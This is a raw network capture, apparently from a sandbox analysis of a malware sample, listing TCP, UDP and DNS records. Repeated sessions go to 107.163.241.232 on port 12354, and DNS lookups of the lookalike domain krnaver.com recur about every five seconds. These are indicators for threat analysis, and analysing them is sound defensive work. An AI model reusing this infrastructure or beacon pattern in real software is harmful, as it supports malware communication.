Dec 11, 2024 16:30:47.725020885 CET	80	63902	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:47.725063086 CET	80	50781	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:47.725135088 CET	63902	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:47.725135088 CET	50781	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:47.725795031 CET	50781	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:47.848851919 CET	80	50781	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:47.959947109 CET	49512	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:47.959978104 CET	49405	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:47.960019112 CET	50781	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:48.083204985 CET	51246	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:48.084861040 CET	51247	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:48.086515903 CET	51248	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:48.203066111 CET	80	51246	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:48.203154087 CET	51246	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:48.203406096 CET	51246	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:48.204576969 CET	12354	51247	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:48.204655886 CET	51247	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:48.205173969 CET	51247	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:48.206149101 CET	12354	51248	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:48.206337929 CET	51248	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:48.206337929 CET	51248	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:48.322755098 CET	80	51246	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:48.324459076 CET	12354	51247	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:48.325578928 CET	12354	51248	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:49.780329943 CET	80	51246	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:49.780421019 CET	51246	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:49.826811075 CET	52679	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:49.826864958 CET	443	52679	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:49.827406883 CET	52679	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:49.828078032 CET	52679	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:49.828094006 CET	443	52679	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:50.318064928 CET	12354	51248	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:50.318159103 CET	51248	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:50.318312883 CET	12354	51247	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:50.318382978 CET	51247	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:50.318682909 CET	51248	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:50.319411993 CET	53222	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:50.319648981 CET	51247	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:50.434362888 CET	53356	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:50.437870026 CET	12354	51248	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:50.438637018 CET	12354	53222	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:50.438710928 CET	53222	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:50.438806057 CET	12354	51247	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:50.439488888 CET	53222	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:50.553791046 CET	12354	53356	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:50.553886890 CET	53356	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:50.554642916 CET	53356	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:50.558792114 CET	12354	53222	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:50.674345016 CET	12354	53356	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:52.014123917 CET	443	52679	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:52.014231920 CET	52679	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:52.014904976 CET	443	52679	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:52.015872955 CET	52679	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:52.033876896 CET	52679	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:52.033971071 CET	443	52679	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:52.034060955 CET	52679	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:52.084901094 CET	53356	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:52.084953070 CET	53222	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:52.086137056 CET	54771	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:52.150671005 CET	51246	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:52.151005983 CET	54863	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:52.197144032 CET	54925	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:52.205449104 CET	12354	54771	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:52.205571890 CET	54771	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:52.205847979 CET	54771	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:52.270381927 CET	80	54863	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:52.270481110 CET	54863	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:52.270534992 CET	80	51246	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:52.270607948 CET	51246	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:52.271111965 CET	54863	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:52.316421032 CET	12354	54925	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:52.316524982 CET	54925	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:52.317039967 CET	54925	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:52.325007915 CET	12354	54771	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:52.390773058 CET	80	54863	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:52.436311007 CET	12354	54925	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:53.854703903 CET	80	54863	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:53.854880095 CET	54863	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:54.087373972 CET	56742	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:54.087428093 CET	443	56742	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:54.087488890 CET	56742	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:54.089150906 CET	56742	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:54.089179993 CET	443	56742	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:54.320713043 CET	12354	54771	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:54.321134090 CET	54771	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:54.322175026 CET	54771	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:54.322737932 CET	56860	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:54.429066896 CET	12354	54925	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:54.430169106 CET	54925	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:54.441870928 CET	12354	54771	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:54.442528963 CET	12354	56860	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:54.442728996 CET	56860	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:54.467022896 CET	54925	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:54.467438936 CET	56860	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:54.586497068 CET	12354	54925	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:54.586720943 CET	12354	56860	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:54.607072115 CET	56879	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:54.726648092 CET	12354	56879	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:54.726732016 CET	56879	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:54.727375031 CET	56879	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:54.847059011 CET	12354	56879	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:55.775381088 CET	443	56742	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:55.775463104 CET	56742	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:55.776163101 CET	443	56742	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:55.776207924 CET	56742	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:55.800858021 CET	56742	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:55.800951004 CET	443	56742	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:55.801017046 CET	56742	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:56.168397903 CET	56879	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:56.168425083 CET	56860	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:56.252835035 CET	57630	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:56.372240067 CET	12354	57630	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:56.372612953 CET	57630	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:56.402090073 CET	57630	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:56.479233980 CET	54863	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:56.479621887 CET	57650	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:56.522361040 CET	12354	57630	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:56.569792986 CET	57670	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:56.598903894 CET	80	57650	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:56.598979950 CET	57650	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:56.599263906 CET	57650	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:56.599518061 CET	80	54863	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:56.599594116 CET	54863	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:56.692502022 CET	12354	57670	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:56.692594051 CET	57670	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:56.706780910 CET	57670	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:56.722600937 CET	80	57650	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:56.826107979 CET	12354	57670	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:58.171178102 CET	80	57650	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:58.171253920 CET	57650	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:58.278325081 CET	58163	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:58.278371096 CET	443	58163	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:58.278630018 CET	58163	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:58.278975964 CET	58163	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:58.278991938 CET	443	58163	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:58.490433931 CET	12354	57630	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:58.491193056 CET	57630	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:58.491193056 CET	57630	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:58.491791010 CET	58364	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:58.610470057 CET	12354	57630	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:58.611108065 CET	12354	58364	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:58.611177921 CET	58364	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:58.611466885 CET	58364	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:58.730947018 CET	12354	58364	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:58.803143024 CET	12354	57670	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:58.803244114 CET	57670	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:58.804552078 CET	57670	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:58.805365086 CET	58692	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:58.924000025 CET	12354	57670	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:58.924989939 CET	12354	58692	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:58.925080061 CET	58692	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:58.925472021 CET	58692	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:59.045449018 CET	12354	58692	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:59.996737957 CET	443	58163	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:59.996822119 CET	58163	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:59.999551058 CET	443	58163	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:59.999609947 CET	58163	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:31:00.729608059 CET	12354	58364	107.163.241.232	192.168.2.7
Dec 11, 2024 16:31:00.729701042 CET	58364	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:31:00.752482891 CET	58364	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:31:00.871929884 CET	12354	58364	107.163.241.232	192.168.2.7
Dec 11, 2024 16:31:01.036587954 CET	12354	58692	107.163.241.232	192.168.2.7
Dec 11, 2024 16:31:01.036663055 CET	58692	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:31:01.069070101 CET	58692	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:31:01.188890934 CET	12354	58692	107.163.241.232	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 11, 2024 16:26:58.958899021 CET	49302	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:26:59.098516941 CET	53	49302	1.1.1.1	192.168.2.7
Dec 11, 2024 16:27:03.573196888 CET	52209	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:27:03.715369940 CET	53	52209	1.1.1.1	192.168.2.7
Dec 11, 2024 16:27:05.219870090 CET	55012	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:27:05.359375954 CET	53	55012	1.1.1.1	192.168.2.7
Dec 11, 2024 16:27:08.249222040 CET	52012	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:27:08.386346102 CET	53	52012	1.1.1.1	192.168.2.7
Dec 11, 2024 16:27:13.363615990 CET	64474	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:27:13.501458883 CET	53	64474	1.1.1.1	192.168.2.7
Dec 11, 2024 16:27:18.164134026 CET	61352	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:27:18.303574085 CET	53	61352	1.1.1.1	192.168.2.7
Dec 11, 2024 16:27:24.068161011 CET	56051	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:27:24.206629038 CET	53	56051	1.1.1.1	192.168.2.7
Dec 11, 2024 16:27:28.319474936 CET	50692	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:27:28.456753016 CET	53	50692	1.1.1.1	192.168.2.7
Dec 11, 2024 16:27:33.235018015 CET	53494	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:27:33.373859882 CET	53	53494	1.1.1.1	192.168.2.7
Dec 11, 2024 16:27:38.272294998 CET	50317	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:27:38.409007072 CET	53	50317	1.1.1.1	192.168.2.7
Dec 11, 2024 16:27:43.210416079 CET	50421	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:27:43.349679947 CET	53	50421	1.1.1.1	192.168.2.7
Dec 11, 2024 16:27:48.210340977 CET	53115	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:27:48.413947105 CET	53	53115	1.1.1.1	192.168.2.7
Dec 11, 2024 16:27:53.210360050 CET	57334	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:27:53.351824045 CET	53	57334	1.1.1.1	192.168.2.7
Dec 11, 2024 16:27:58.180254936 CET	63741	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:27:58.320488930 CET	53	63741	1.1.1.1	192.168.2.7
Dec 11, 2024 16:28:03.452271938 CET	58993	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:28:03.589027882 CET	53	58993	1.1.1.1	192.168.2.7
Dec 11, 2024 16:28:08.180217028 CET	55449	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:28:08.316977978 CET	53	55449	1.1.1.1	192.168.2.7
Dec 11, 2024 16:28:11.291470051 CET	52110	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:28:11.434941053 CET	53	52110	1.1.1.1	192.168.2.7
Dec 11, 2024 16:28:13.210511923 CET	62671	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:28:13.348390102 CET	53	62671	1.1.1.1	192.168.2.7
Dec 11, 2024 16:28:18.196538925 CET	53718	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:28:18.334908962 CET	53	53718	1.1.1.1	192.168.2.7
Dec 11, 2024 16:28:23.163521051 CET	59277	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:28:23.302721024 CET	53	59277	1.1.1.1	192.168.2.7
Dec 11, 2024 16:28:28.164832115 CET	53655	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:28:28.303472042 CET	53	53655	1.1.1.1	192.168.2.7
Dec 11, 2024 16:28:33.208530903 CET	53567	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:28:33.345509052 CET	53	53567	1.1.1.1	192.168.2.7
Dec 11, 2024 16:28:38.172414064 CET	50844	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:28:38.309173107 CET	53	50844	1.1.1.1	192.168.2.7
Dec 11, 2024 16:28:43.214715958 CET	53344	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:28:43.351516962 CET	53	53344	1.1.1.1	192.168.2.7
Dec 11, 2024 16:28:48.163342953 CET	49326	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:28:48.300779104 CET	53	49326	1.1.1.1	192.168.2.7
Dec 11, 2024 16:28:53.164582968 CET	56160	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:28:53.302664042 CET	53	56160	1.1.1.1	192.168.2.7
Dec 11, 2024 16:28:58.165636063 CET	54452	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:28:58.302090883 CET	53	54452	1.1.1.1	192.168.2.7
Dec 11, 2024 16:29:03.167946100 CET	63105	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:29:03.307043076 CET	53	63105	1.1.1.1	192.168.2.7
Dec 11, 2024 16:29:08.168334007 CET	62464	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:29:08.305144072 CET	53	62464	1.1.1.1	192.168.2.7
Dec 11, 2024 16:29:13.205563068 CET	55254	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:29:13.347394943 CET	53	55254	1.1.1.1	192.168.2.7
Dec 11, 2024 16:29:18.163279057 CET	53660	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:29:18.309483051 CET	53	53660	1.1.1.1	192.168.2.7
Dec 11, 2024 16:29:20.966624975 CET	56620	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:29:21.105952978 CET	53	56620	1.1.1.1	192.168.2.7
Dec 11, 2024 16:29:23.164345026 CET	64714	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:29:23.306258917 CET	53	64714	1.1.1.1	192.168.2.7
Dec 11, 2024 16:29:28.318862915 CET	52971	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:29:28.475419998 CET	53	52971	1.1.1.1	192.168.2.7
Dec 11, 2024 16:29:33.251763105 CET	59117	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:29:33.391732931 CET	53	59117	1.1.1.1	192.168.2.7
Dec 11, 2024 16:29:38.163604021 CET	55165	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:29:38.300527096 CET	53	55165	1.1.1.1	192.168.2.7
Dec 11, 2024 16:29:43.751810074 CET	64537	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:29:43.895608902 CET	53	64537	1.1.1.1	192.168.2.7
Dec 11, 2024 16:29:48.163280010 CET	57943	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:29:48.304701090 CET	53	57943	1.1.1.1	192.168.2.7
Dec 11, 2024 16:29:53.176417112 CET	54246	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:29:53.314521074 CET	53	54246	1.1.1.1	192.168.2.7
Dec 11, 2024 16:29:58.163691998 CET	58068	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:29:58.300941944 CET	53	58068	1.1.1.1	192.168.2.7
Dec 11, 2024 16:30:03.177546024 CET	64418	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:30:03.315331936 CET	53	64418	1.1.1.1	192.168.2.7
Dec 11, 2024 16:30:08.169487000 CET	53055	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:30:08.307987928 CET	53	53055	1.1.1.1	192.168.2.7
Dec 11, 2024 16:30:13.163069963 CET	60651	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:30:13.307013988 CET	53	60651	1.1.1.1	192.168.2.7
Dec 11, 2024 16:30:18.163994074 CET	58826	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:30:18.300774097 CET	53	58826	1.1.1.1	192.168.2.7
Dec 11, 2024 16:30:23.177699089 CET	54766	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:30:23.314745903 CET	53	54766	1.1.1.1	192.168.2.7
Dec 11, 2024 16:30:28.589804888 CET	59235	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:30:28.738006115 CET	53	59235	1.1.1.1	192.168.2.7
Dec 11, 2024 16:30:29.040386915 CET	51394	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:30:29.225537062 CET	51394	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:30:29.746932983 CET	53	51394	1.1.1.1	192.168.2.7
Dec 11, 2024 16:30:29.747040033 CET	53	51394	1.1.1.1	192.168.2.7
Dec 11, 2024 16:30:33.214951038 CET	58903	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:30:33.351377964 CET	53	58903	1.1.1.1	192.168.2.7
Dec 11, 2024 16:30:38.163326025 CET	62785	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:30:38.301096916 CET	53	62785	1.1.1.1	192.168.2.7
Dec 11, 2024 16:30:43.163589954 CET	52714	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:30:43.303376913 CET	53	52714	1.1.1.1	192.168.2.7
Dec 11, 2024 16:30:48.166336060 CET	61342	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:30:48.302953005 CET	53	61342	1.1.1.1	192.168.2.7
Dec 11, 2024 16:30:53.167958021 CET	62391	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:30:53.304497957 CET	53	62391	1.1.1.1	192.168.2.7
Dec 11, 2024 16:30:58.163026094 CET	59347	53	192.168.2.7	1.1.1.1
Dec 11, 2024 16:30:58.304272890 CET	53	59347	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 11, 2024 16:26:58.958899021 CET	192.168.2.7	1.1.1.1	0x9b9a	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:27:03.573196888 CET	192.168.2.7	1.1.1.1	0xdf	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:27:05.219870090 CET	192.168.2.7	1.1.1.1	0xd3e0	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:27:08.249222040 CET	192.168.2.7	1.1.1.1	0x42ad	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:27:13.363615990 CET	192.168.2.7	1.1.1.1	0x3a53	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:27:18.164134026 CET	192.168.2.7	1.1.1.1	0x1aa8	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:27:24.068161011 CET	192.168.2.7	1.1.1.1	0xa32d	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:27:28.319474936 CET	192.168.2.7	1.1.1.1	0x1f2e	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:27:33.235018015 CET	192.168.2.7	1.1.1.1	0x3a6a	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:27:38.272294998 CET	192.168.2.7	1.1.1.1	0xe4d5	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:27:43.210416079 CET	192.168.2.7	1.1.1.1	0x610	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:27:48.210340977 CET	192.168.2.7	1.1.1.1	0xf8fd	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:27:53.210360050 CET	192.168.2.7	1.1.1.1	0x7d50	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:27:58.180254936 CET	192.168.2.7	1.1.1.1	0xadbb	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:28:03.452271938 CET	192.168.2.7	1.1.1.1	0xe770	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:28:08.180217028 CET	192.168.2.7	1.1.1.1	0x6660	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:28:11.291470051 CET	192.168.2.7	1.1.1.1	0x76a7	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:28:13.210511923 CET	192.168.2.7	1.1.1.1	0x10fa	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:28:18.196538925 CET	192.168.2.7	1.1.1.1	0xb10f	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:28:23.163521051 CET	192.168.2.7	1.1.1.1	0x27eb	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:28:28.164832115 CET	192.168.2.7	1.1.1.1	0x9b52	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:28:33.208530903 CET	192.168.2.7	1.1.1.1	0xfee3	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:28:38.172414064 CET	192.168.2.7	1.1.1.1	0x3a7d	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:28:43.214715958 CET	192.168.2.7	1.1.1.1	0x411f	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:28:48.163342953 CET	192.168.2.7	1.1.1.1	0xcce0	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:28:53.164582968 CET	192.168.2.7	1.1.1.1	0x9dbf	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:28:58.165636063 CET	192.168.2.7	1.1.1.1	0x4e25	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:29:03.167946100 CET	192.168.2.7	1.1.1.1	0x30b7	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:29:08.168334007 CET	192.168.2.7	1.1.1.1	0x3e5a	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:29:13.205563068 CET	192.168.2.7	1.1.1.1	0xe750	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:29:18.163279057 CET	192.168.2.7	1.1.1.1	0x861a	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:29:20.966624975 CET	192.168.2.7	1.1.1.1	0xbca6	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:29:23.164345026 CET	192.168.2.7	1.1.1.1	0x598d	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:29:28.318862915 CET	192.168.2.7	1.1.1.1	0x4017	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:29:33.251763105 CET	192.168.2.7	1.1.1.1	0x9288	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
